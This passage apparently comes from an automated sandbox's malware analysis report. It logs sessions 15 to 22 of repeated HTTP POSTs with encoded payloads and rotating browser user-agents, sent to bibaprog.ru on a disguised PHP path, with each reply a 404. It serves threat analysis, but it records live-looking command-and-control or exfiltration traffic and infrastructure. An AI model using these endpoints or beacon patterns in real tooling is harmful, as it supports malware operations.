                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J2%2F%2By1X8Ky15NfN%2B4w3agwdSGhC%2BZsJtHKUUlCR0JKGfnG9qDoe4A1bRXz69HouDla70EgjHjctqQE2ENho0I2zlbu4cCbB21xLeRwqFUsklO1Q0WTF9z7zKBE%2Bc8Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 90157318493c8ca1-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3889&min_rtt=1965&rtt_var=4586&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=84082&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          15192.168.2.549990104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:39:42.406017065 CET347OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                          Host: bibaprog.ru
                                                          Content-Length: 336
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:39:42.756401062 CET336OUTData Raw: 05 07 04 07 03 0b 04 05 05 06 02 01 02 05 01 07 00 01 05 0e 02 0d 03 0c 01 0f 0a 05 07 01 00 07 0d 53 04 0d 07 0c 04 0a 0b 05 06 00 06 06 07 54 07 03 0e 5c 0a 02 06 56 01 07 07 04 04 52 04 0a 01 03 0c 0d 05 52 04 54 0e 57 0b 04 0a 00 0d 04 05 03
                                                          Data Ascii: ST\VRRTWRSV\L~|`PM`Ln_vKh|By`o|Bc|l|glNrS]Pw^}_~V@xSn~uy
                                                          Jan 13, 2025 13:39:42.854703903 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:39:43.074819088 CET1019INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:39:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P46V3VI57W%2Bu5JlrrGPJA9F4bpK38D01x1sJyT90iJPlfkDYXE2PuMsGdxSg6gjhbiJxKWHL6cJAD1h%2FmlWtkTzLUuKVXs%2FEEHXuGvnDh4%2F0ZXBNVKUDlTxF5S3l5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 9015735c8819de95-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7927&min_rtt=1662&rtt_var=13155&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=683&delivery_rate=28191&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          16192.168.2.549991104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:39:53.952670097 CET347OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:39:54.303354979 CET344OUTData Raw: 00 03 01 05 03 0a 01 06 05 06 02 01 02 04 01 05 00 0b 05 09 02 00 03 0e 07 03 0d 04 03 01 00 07 0f 04 06 0f 02 53 07 06 0f 07 04 02 06 04 07 01 07 04 0c 5d 0f 57 07 01 06 01 07 05 07 0b 00 09 01 53 0d 09 04 0e 05 04 0e 52 0f 05 0f 04 0f 04 02 03
                                                          Data Ascii: S]WSRSTV\L}T|NjvqrXuuhojXcl`L|cQXlUp_{NTD~|CcdwZj_~V@@{SPN~ri
                                                          Jan 13, 2025 13:39:54.396323919 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:39:54.547436953 CET1023INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:39:54 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qo4ZQVYAP3x8MiYnm%2FSCsFy%2BDzyY2mrgWLJqntSZA%2BnvV%2FZvC0l9wet0Knm9r4YVyAcGoYiPQBvRZIfZBY77j%2FSOLavmeybH6EHMYiLpJadSCgLKbzWw%2BPHTO5IV4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 901573a4b99c4414-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8473&min_rtt=1701&rtt_var=14183&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=26125&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          17192.168.2.549992104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:40:05.027635098 CET347OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:40:05.381364107 CET344OUTData Raw: 00 04 04 06 03 0a 04 07 05 06 02 01 02 0c 01 02 00 04 05 0b 02 05 03 01 02 05 0e 05 04 55 03 07 0c 0e 06 5e 01 06 06 05 0c 57 05 0b 00 0a 05 01 05 05 0b 0d 0c 01 04 56 06 53 03 07 05 06 00 01 02 03 0c 09 05 04 01 04 0f 07 0c 05 0a 0d 0e 09 06 01
                                                          Data Ascii: U^WVST]\L~Ak^jc[uukRB}BvwYkstIolUxpX|SStwlNj_~V@xmTL}b[
                                                          Jan 13, 2025 13:40:05.481450081 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:40:05.719983101 CET1020INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:40:05 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=APr2lqU7VFkZCQUc%2Fee7yWvt1P3VmVd%2B9faIEMd8rBdhmzzcV4XOSrwpg%2BJFm4JVjiU%2FQ0gxzg84nVcwEAeSAnN2uf72ewTQC7ERT66jwm5XM2WDdFcURqkOaCfIpQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 901573e9fb197c6a-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=10020&min_rtt=1905&rtt_var=16944&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=21848&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          18192.168.2.549993104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:40:11.839567900 CET347OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:40:12.193876028 CET344OUTData Raw: 00 06 01 00 03 08 01 04 05 06 02 01 02 07 01 01 00 00 05 0f 02 0c 03 0e 03 03 0e 00 07 03 01 07 0f 53 03 08 00 57 06 0a 0e 00 05 53 06 53 06 0f 06 01 0c 59 0e 03 05 01 06 57 06 01 01 00 07 0e 03 53 0a 0d 07 0e 04 55 0b 02 0c 55 0c 01 0b 06 06 07
                                                          Data Ascii: SWSSYWSUUQQ\L~@`Tcr}LvulBywhBk`kYylt[zpaX}m``Y|e~V@AxSzri
                                                          Jan 13, 2025 13:40:12.296238899 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:40:12.525507927 CET1024INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:40:12 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oCCqGn9HDvQOcZ5nbd3uYz%2Fopg%2FkcFT%2FKqZEn5Higo66NQQWldB%2FvvNLtMYF%2BDfTQAkA%2FqFlQye9Rjy9z0QEANI7lt5Jim3xfqyT8KevqoeqrTwjt8lnok6N%2FW4oCw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 901574149ab34414-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3487&min_rtt=1749&rtt_var=4133&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=93231&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          19192.168.2.549994104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:40:22.812485933 CET330OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:40:23.163531065 CET344OUTData Raw: 00 05 01 05 06 08 01 02 05 06 02 01 02 00 01 03 00 05 05 09 02 03 03 0e 01 00 0a 00 05 05 01 08 0c 05 07 0f 00 51 07 06 0b 03 05 50 05 03 05 56 04 07 0c 5a 0c 05 01 02 07 05 04 00 04 55 06 09 02 03 0e 0d 00 0e 06 03 0d 0f 0d 00 0f 01 0c 52 02 07
                                                          Data Ascii: QPVZURYZRR\L~|p}]trr^vf`hlyMcR`Mh]pK{|dZl`TpCtww]}_~V@x}nN~Li
                                                          Jan 13, 2025 13:40:23.275149107 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:40:23.504333973 CET1007INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:40:23 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6YmI6cNhDLj3T69PntJ6dYFC9zeSQY6d8XNSjPjV4oa0hTkbflWYzHqwyJHxj8zItutf%2FxTrOeB2H666lSPYDmOx6E1PUu1LXKOgd1129jeYZnMeafHEt92RvfQ5Nw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 9015745929ad42e9-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4653&min_rtt=1725&rtt_var=6503&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=674&delivery_rate=58047&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                                          Jan 13, 2025 13:40:23.596265078 CET5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          20192.168.2.549995104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:40:33.813540936 CET294OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:40:34.162719965 CET344OUTData Raw: 00 03 04 0c 03 08 04 01 05 06 02 01 02 0d 01 05 00 07 05 01 02 0c 03 08 02 0f 0c 00 06 01 01 06 0f 05 07 01 00 56 06 55 0e 54 07 54 05 03 07 03 05 03 0c 59 0d 04 05 04 05 02 05 04 05 04 07 5a 01 00 0c 0e 05 56 07 05 0c 57 0d 07 0a 06 0c 04 06 0d
                                                          Data Ascii: VUTTYZVWSSV\L~hjw[iuethl~]wl^kccYlUK{i[|npc^h}O~V@{Sfrq
                                                          Jan 13, 2025 13:40:34.273008108 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:40:34.502424955 CET1022INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:40:34 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UOCQeiDFF%2BSlQHkxsRsTMVMsqexuK2JWNt69h04yRXISCBPSov%2F4%2B9OsUXZ7c%2F7J4Rdon%2FlU4BgXpZvUSdQ4mj8S5CkY%2FtwmmywLU1b2YRNV2RGEKow%2FP63qnvyt4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 9015749dea638ca1-EWR
                                                          alt-svc: h2=":443"; ma=60
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3137&min_rtt=1947&rtt_var=3110&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=127299&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          21192.168.2.549996104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:40:44.998869896 CET347OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:40:45.351239920 CET344OUTData Raw: 00 06 01 00 03 08 01 04 05 06 02 01 02 07 01 01 00 00 05 0f 02 0c 03 0e 03 03 0e 00 07 03 01 07 0f 53 03 08 00 57 06 0a 0e 00 05 53 06 53 06 0f 06 01 0c 59 0e 03 05 01 06 57 06 01 01 00 07 0e 03 53 0a 0d 07 0e 04 55 0b 02 0c 55 0c 01 0b 06 06 07
                                                          Data Ascii: SWSSYWSUUQQ\L~@`Tcr}LvulBywhBk`kYylt[zpaX}m``Y|e~V@AxSzri
                                                          Jan 13, 2025 13:40:45.452538967 CET25INHTTP/1.1 100 Continue
                                                          Jan 13, 2025 13:40:45.678194046 CET1015INHTTP/1.1 404 Not Found
                                                          Date: Mon, 13 Jan 2025 12:40:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dr8GGqLOcodGl6LM5ZUhxyf2u8u3MmwpMmsC8yelzQct8Y5JCzCHQMRmtp2hYh%2BckF0ydhEmoUYhdW4%2BcAwujCZAHzKNvnHQJVFjnkkeSP8tZrgwCgVr6YxsCDNrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 901574e3cac48ca1-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=9847&min_rtt=1911&rtt_var=16589&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=22324&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          22192.168.2.549997104.21.64.180
                                                          TimestampBytes transferredDirectionData
                                                          Jan 13, 2025 13:40:56.330138922 CET330OUTPOST /ProviderEternallineauthmultiTrackwordpressWpDownloads.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                          Host: bibaprog.ru
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Jan 13, 2025 13:40:56.678443909 CET344OUTData Raw: 00 06 04 06 06 0e 04 02 05 06 02 01 02 03 01 06 00 01 05 0b 02 06 03 0b 00 03 0f 51 07 01 01 53 0c 56 03 00 01 00 05 01 0d 00 04 01 04 00 04 01 05 00 0b 0b 0a 06 05 04 06 55 07 05 07 05 05 0f 02 56 0e 08 05 0e 05 05 0d 07 0e 05 0e 0d 0d 08 05 51
                                                          Data Ascii: QSVUVQQU\L}Q|NvNtbmOv[xB~bXwU|B|]k[xlHxNeZ|SxAwwhL~_~V@{m~L}\}
                                                          Jan 13, 2025 13:40:56.793078899 CET25INHTTP/1.1 100 Continue
